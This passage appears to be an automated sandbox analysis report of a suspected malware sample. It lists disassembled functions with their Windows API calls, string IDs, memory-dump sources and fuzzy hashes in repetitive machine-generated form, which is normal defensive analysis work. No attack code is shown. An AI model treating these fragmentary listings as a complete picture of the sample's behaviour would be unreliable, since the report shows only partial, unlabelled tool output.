                                                                                                                      • Opcode Fuzzy Hash: 89ad9156440b11216bd871cd2cb196bc59503b00613421d0d385a9623bf1b778
                                                                                                                      • Instruction Fuzzy Hash: FFB18E799001099BCF94EF95C485FFEB7B5EB44314F11842FE902A7291DB389A82CB9D
                                                                                                                      Function 0053AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __itow_s
                                                                                                                      • String ID: xbX$xbX
                                                                                                                      • API String ID: 3653519197-1216199179
                                                                                                                      • Opcode ID: 68c602f46d51fefb1c2189780106b8653f95c7b1ab15a0aa3ef179f861f8db3c
                                                                                                                      • Instruction ID: da3ddf98c2f0ca28bae05609050b1044604c483b860959732389ef9fb55f54ce
                                                                                                                      • Opcode Fuzzy Hash: 68c602f46d51fefb1c2189780106b8653f95c7b1ab15a0aa3ef179f861f8db3c
                                                                                                                      • Instruction Fuzzy Hash: DAB1AF74A00109EFDB14EF55C891EBABBB9FF58304F14855EFA459B291EB34E980CB60
                                                                                                                      Function 0052AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004DFC86: _wcscpy.LIBCMT ref: 004DFCA9
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                      • __wcsnicmp.LIBCMT ref: 0052B02D
                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0052B0F6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                      • String ID: LPT
                                                                                                                      • API String ID: 3222508074-1350329615
                                                                                                                      • Opcode ID: 0a4aeaf5fb585e5cdf9bdffdc69c7c0dfd62f4b47697b3e1468f43423a03a3a5
                                                                                                                      • Instruction ID: 299c5f89dc210b5cc4bbb34ca245f61cf1738a6d47c71df13e9c0eda3a718f43
                                                                                                                      • Opcode Fuzzy Hash: 0a4aeaf5fb585e5cdf9bdffdc69c7c0dfd62f4b47697b3e1468f43423a03a3a5
                                                                                                                      • Instruction Fuzzy Hash: BB61B075A00224AFDB14DF99D895EAEBBB4FF09710F00406EF916AB291D730AE84CB54
                                                                                                                      Function 004D2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 004D2968
                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 004D2981
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                      • Opcode ID: 9b8b8e1d98aea3c087194fe3d2322c50dfedc23cf54201b3d2e171d08381cf81
                                                                                                                      • Instruction ID: 50df1ee9fcd4622b8d76280c1a7c40e7f7b2c0573ba0c94a0b361899e2b16199
                                                                                                                      • Opcode Fuzzy Hash: 9b8b8e1d98aea3c087194fe3d2322c50dfedc23cf54201b3d2e171d08381cf81
                                                                                                                      • Instruction Fuzzy Hash: 33516971418744ABD360EF15D885BAFB7E8FB95344F41485EF1D8420A1DB74892CCB6A
                                                                                                                      Function 00529734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C4F0B: __fread_nolock.LIBCMT ref: 004C4F29
                                                                                                                      • _wcscmp.LIBCMT ref: 00529824
                                                                                                                      • _wcscmp.LIBCMT ref: 00529837
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscmp$__fread_nolock
                                                                                                                      • String ID: FILE
                                                                                                                      • API String ID: 4029003684-3121273764
                                                                                                                      • Opcode ID: 02a95a42ecdf29738eae360ea6d046ac7b1ffe05566e94849fef79b7a2ddbfd8
                                                                                                                      • Instruction ID: 8ccc521a929834fc26af3ee9aaaca283c21c6fc1b8013e5af26bfb65f743ff64
                                                                                                                      • Opcode Fuzzy Hash: 02a95a42ecdf29738eae360ea6d046ac7b1ffe05566e94849fef79b7a2ddbfd8
                                                                                                                      • Instruction Fuzzy Hash: D141D875A0021ABADF219AA1DC45FEFBBBDEF86714F00046EF904A72C0D6759A04CB65
                                                                                                                      Function 00500574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID: DdX$DdX
                                                                                                                      • API String ID: 1473721057-2328636738
                                                                                                                      • Opcode ID: 4f5bc35f75eaddc5cd137270cda827750aa4cf44eee692abdfe105402e48f541
                                                                                                                      • Instruction ID: 5596c381823998227a3e04513dad83b458a49919866a804d7db1860204235433
                                                                                                                      • Opcode Fuzzy Hash: 4f5bc35f75eaddc5cd137270cda827750aa4cf44eee692abdfe105402e48f541
                                                                                                                      • Instruction Fuzzy Hash: 5C5121B86083058FDB90CF19C484B1ABBF1FB99358F54885EE8858B361D739EC95CB46
                                                                                                                      Function 0053258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0053259E
                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 005325D4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CrackInternet_memset
                                                                                                                      • String ID: |
                                                                                                                      • API String ID: 1413715105-2343686810
                                                                                                                      • Opcode ID: 37d2f371aa051f43c7f30d0762798127b5ea2b3f8c0285359d452232e704c274
                                                                                                                      • Instruction ID: 540ce8b6b7d7ba7ec5435f172c3ffad1a737de3c3dc75874fc42feafe5f751f6
                                                                                                                      • Opcode Fuzzy Hash: 37d2f371aa051f43c7f30d0762798127b5ea2b3f8c0285359d452232e704c274
                                                                                                                      • Instruction Fuzzy Hash: 57312A75801119ABCF41EFA5CC86EEEBFB8FF08314F10005AF914A6162EB355955DF60
                                                                                                                      Function 00547A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00547B61
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00547B76
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: '
                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                      • Opcode ID: 7a2d88449c0b7d40d39cda86540b464288e8d1b4f8b18fb6b28f77e4d0f24bf6
                                                                                                                      • Instruction ID: f8abe17fb2583d069f06509e017aa264b474db1f1abadf915802b40442d830bc
                                                                                                                      • Opcode Fuzzy Hash: 7a2d88449c0b7d40d39cda86540b464288e8d1b4f8b18fb6b28f77e4d0f24bf6
                                                                                                                      • Instruction Fuzzy Hash: 52410874A0520E9FDB14CF65C981BDABBB5FF08304F10056AE904EB351E770AA55DF90
                                                                                                                      Function 00546A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00546B17
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00546B53
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                      • Opcode ID: c25862db21186509949b50d6319e9e9030ef634fb348bcac218d3eb88003978a
                                                                                                                      • Instruction ID: 3186f7f59f328fc4c87a1ad7853918bc005561c5c2c32b34c3ca3da34d101fce
                                                                                                                      • Opcode Fuzzy Hash: c25862db21186509949b50d6319e9e9030ef634fb348bcac218d3eb88003978a
                                                                                                                      • Instruction Fuzzy Hash: 8E31BE71200604AEEB109F29CC80FFB7BA9FF49768F10861EF9A5D3190DA34AC81D761
                                                                                                                      Function 005228A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00522911
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0052294C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                      • Opcode ID: 218e855dc012ef60abd137cc1ba18bd7e4c3e97d15c46edff1af765a7cdc3e4d
                                                                                                                      • Instruction ID: b7a9c6c62f0fe2030125c07599c6f8e04db890a07afc0f9f7d7e66361238df52
                                                                                                                      • Opcode Fuzzy Hash: 218e855dc012ef60abd137cc1ba18bd7e4c3e97d15c46edff1af765a7cdc3e4d
                                                                                                                      • Instruction Fuzzy Hash: FC31C039A00319ABEB248F49E885BAEBFA8FF46350F140029ED81A61E0D77099C4CB11
                                                                                                                      Function 005466D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00546761
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0054676C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: Combobox
                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                      • Opcode ID: fe5e01c8d77ab604a1aff874a41135670c3fbc0869a63da8b09440e80e9a22af
                                                                                                                      • Instruction ID: 864a1103efc0856319bb9011112c5ea95758185f625b00d5c1f889e28c4356d7
                                                                                                                      • Opcode Fuzzy Hash: fe5e01c8d77ab604a1aff874a41135670c3fbc0869a63da8b09440e80e9a22af
                                                                                                                      • Instruction Fuzzy Hash: 4511BF75200208AFEF218F54DC80FFB3B6AFB8A3ACF114129F91897291D635EC5197A1
                                                                                                                      Function 00546C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004C1D73
                                                                                                                        • Part of subcall function 004C1D35: GetStockObject.GDI32(00000011), ref: 004C1D87
                                                                                                                        • Part of subcall function 004C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 004C1D91
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00546C71
                                                                                                                      • GetSysColor.USER32(00000012), ref: 00546C8B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                      • Opcode ID: 55014069a1f090bdca503b159a06fb2d4ed3e79cb9c804c9d0b098c1910d7e90
                                                                                                                      • Instruction ID: 6f5a4e07bb97f60b74ba922af4679edccb661d337791011cc26bc36bf9fff885
                                                                                                                      • Opcode Fuzzy Hash: 55014069a1f090bdca503b159a06fb2d4ed3e79cb9c804c9d0b098c1910d7e90
                                                                                                                      • Instruction Fuzzy Hash: 33211776520209AFDF04DFA8CC85EEA7BA8FB09318F014629FD95D2250E635E8509B61
                                                                                                                      Function 00546920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 005469A2
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005469B1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                      • String ID: edit
                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                      • Opcode ID: e8485ad3c276ae3046b111dc527960285d6885f21f51f6939a097d79c8a557a5
                                                                                                                      • Instruction ID: 6e1f8f31a2c1fdafc3b6a9cf2f45dcc217ed0b123af73f922f594070b0bcaae5
                                                                                                                      • Opcode Fuzzy Hash: e8485ad3c276ae3046b111dc527960285d6885f21f51f6939a097d79c8a557a5
                                                                                                                      • Instruction Fuzzy Hash: EA116A71100208ABEB108E689C44BEB3BA9FB163BCF504728F9A5971E0C6B5DC94A761
                                                                                                                      Function 005229AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00522A22
                                                                                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00522A41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                      • Opcode ID: 2db0eb8e1358497261a860f5b1dd7b0ae8e513afdb7f7437cb56dc5fc70ff66d
                                                                                                                      • Instruction ID: 31a21e3a2ffbee2aff4a58e5dbf9f22efb762d061952b76b713cf3d9274bd154
                                                                                                                      • Opcode Fuzzy Hash: 2db0eb8e1358497261a860f5b1dd7b0ae8e513afdb7f7437cb56dc5fc70ff66d
                                                                                                                      • Instruction Fuzzy Hash: 4B11D33AD01124BBCB35DA58EC44BEA7BA8BF47304F144025E855EB2D0D7B0AE0AC791
                                                                                                                      Function 005321D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0053222C
                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00532255
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                      • String ID: <local>
                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                      • Opcode ID: a6935dc88f29e8224de8480a66c4ed1b62912e7fbf31412e06cc0320563e4d8e
                                                                                                                      • Instruction ID: e6ffd791f0df0063d6a27c6194132fd3cd722001e0e2b8a746ad0e4aee5dbc46
                                                                                                                      • Opcode Fuzzy Hash: a6935dc88f29e8224de8480a66c4ed1b62912e7fbf31412e06cc0320563e4d8e
                                                                                                                      • Instruction Fuzzy Hash: AB112178541A25BADB258F519C88EFBFFACFF16751F10862AFA0586000D3706884DAF0
                                                                                                                      Function 004D092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,004C3C14,005852F8,?,?,?), ref: 004D096E
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                      • _wcscat.LIBCMT ref: 00504CB7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FullNamePath_memmove_wcscat
                                                                                                                      • String ID: SX
                                                                                                                      • API String ID: 257928180-269960141
                                                                                                                      • Opcode ID: a51d5dc928ad802d84a78dd3328166084ac36574d28278b598fd9c33fbbfdabd
                                                                                                                      • Instruction ID: 2e2e4828d4de768ae45811539a48cc7a065eec4c8d96af1251cb1d42131ada09
                                                                                                                      • Opcode Fuzzy Hash: a51d5dc928ad802d84a78dd3328166084ac36574d28278b598fd9c33fbbfdabd
                                                                                                                      • Instruction Fuzzy Hash: 601186749052089BCB40FF658C15FDD77E8FF08348F0044ABB954D3285EAB4AA844B19
                                                                                                                      Function 00518E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                      Download Yara Rule
